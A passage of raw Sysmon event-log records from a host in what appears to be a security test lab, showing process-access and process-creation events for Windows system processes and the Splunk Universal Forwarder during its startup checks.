15:51:17.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001906Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.831{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C75-5FA1-4F00-000000008801}4084C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001905Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.831{D28789B6-7C75-5FA1-4D00-000000008801}40324028C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7C75-5FA1-4F00-000000008801}4084C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+64ab|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1807c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001904Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.846{D28789B6-7C75-5FA1-4F00-000000008801}4084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7C75-5FA1-4D00-000000008801}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001903Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.800{D28789B6-7C75-5FA1-4E00-000000008801}35003108C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001902Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.566{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C75-5FA1-4E00-000000008801}3500C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001901Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.566{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001900Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.566{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001899Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.566{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001898Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.566{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001897Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.566{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001896Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.566{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001895Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.566{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001894Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.566{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001893Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.566{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001892Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.566{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C75-5FA1-4E00-000000008801}3500C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001891Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.566{D28789B6-7C75-5FA1-4D00-000000008801}40324028C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7C75-5FA1-4E00-000000008801}3500C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1803d|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001890Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.568{D28789B6-7C75-5FA1-4E00-000000008801}3500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7C75-5FA1-4D00-000000008801}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001889Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C75-5FA1-4D00-000000008801}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001888Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001887Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001886Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001885Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001884Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001883Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001882Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001881Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001880Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 